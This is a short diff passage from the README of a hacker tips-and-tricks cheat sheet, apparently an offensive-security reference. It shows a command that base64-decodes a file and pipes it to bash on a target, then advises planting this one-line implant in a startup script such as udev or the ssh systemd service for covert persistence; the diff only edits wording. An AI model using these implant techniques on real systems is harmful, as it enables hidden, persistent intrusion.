hackerschoice/thc-tips-tricks-hacks-cheat-sheet/README.md

 echo "===> Execute the following on the target:"$'\n\033[0;36m'"echo $(<x.txt)|base64 -d|bash"$'\033[0m'
 ```

 2. Add this 1-line implant to any startup script on the target (e.g. to [udev](https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp) or `ExecStartPre=` in */usr/lib/systemd/system/ssh.service*).
-An example ssh.service:
+An clever example for ssh.service:
 ```
 ...
 [Service]